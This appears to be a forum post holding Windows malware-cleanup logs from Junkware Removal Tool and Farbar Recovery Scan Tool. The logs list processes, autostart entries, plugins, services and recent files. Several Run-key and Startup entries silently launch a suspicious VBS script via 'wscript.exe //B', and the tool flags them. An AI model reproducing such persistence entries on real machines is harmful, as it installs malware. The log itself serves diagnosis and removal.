ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Thisisu Version: 6.1.4 (04.06.2014:1) OS: Windows 7 Home Premium x64 Ran by Franz on 16.04.2014 at 23:46:09,11 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Services ~~~ Registry Values ~~~ Registry Keys Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D} ~~~ Files ~~~ Folders ~~~ Event Viewer Logs were cleared ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 16.04.2014 at 23:53:19,02 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New FRST log: FRST.txt: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01 Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 00:04:41 Running from C:\Users\Franz\Desktop Windows 7 Home Premium (X64) OS Language: German Standard Internet Explorer Version 9 Boot Mode: Normal ==================== Processes (Whitelisted) ================= (AMD) C:\Windows\system32\atiesrxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AMD) C:\Windows\system32\atieclxx.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe (Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe (Alcor Micro Corp.) 
C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe (Microsoft Corporation) C:\Windows\System32\wscript.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (Google Inc.) 
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe ==================== Registry (Whitelisted) ================== HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.) 
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation) HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation) HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.) HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated) HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.) 
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs () ==================== Internet (Whitelisted) ==================== HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/ HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = 
hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532 BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) Tcpip\Parameters: [DhcpNameServer] 172.20.10.1 FireFox: ======== FF Plugin: @microsoft.com/GENUINE - disabled No File FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @microsoft.com/GENUINE - disabled No File FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) 
Chrome: ======= CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll () CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll () CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15] CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15] CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15] CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15] CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10] ==================== Services (Whitelisted) ================= R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. 
KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG) R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated) R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated) ==================== Drivers (Whitelisted) ==================== U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG) R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software) S3 catchme; \??\C:\ComboFix\catchme.sys [X] ==================== NetSvcs (Whitelisted) =================== ==================== One Month Created Files and Folders ======== 2014-04-17 00:04 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT 2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt 2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ 
Malwarebytes Anti-Malware 2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox 2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe 2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe 2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi 2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv 2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi 2014-04-14 10:43 - 2014-04-17 00:04 - 00000000 ____D () 
C:\FRST 2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe 2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv 2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv 2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu ==================== One Month Modified Files and Folders ======= 2014-04-17 00:05 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-17 00:04 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST 2014-04-17 00:02 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini 2014-04-17 00:01 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-04-17 00:01 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-04-17 00:01 - 
2009-07-14 06:51 - 00088288 _____ () C:\Windows\setupact.log 2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner 2014-04-17 00:00 - 2013-04-16 19:13 - 01625695 _____ () C:\Windows\WindowsUpdate.log 2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log 2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT 2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt 2014-04-16 23:30 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox 2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default 2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () 
C:\Users\Franz\AppData\Roaming\vlc 2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-04-14 11:21 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat 2014-04-14 11:21 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat 2014-04-14 11:21 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups 2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox 
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos 2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu Some content of TEMP: ==================== C:\Users\Franz\AppData\Local\Temp\avgnt.exe C:\Users\Franz\AppData\Local\Temp\Quarantine.exe ==================== Bamital & volsnap Check ================= 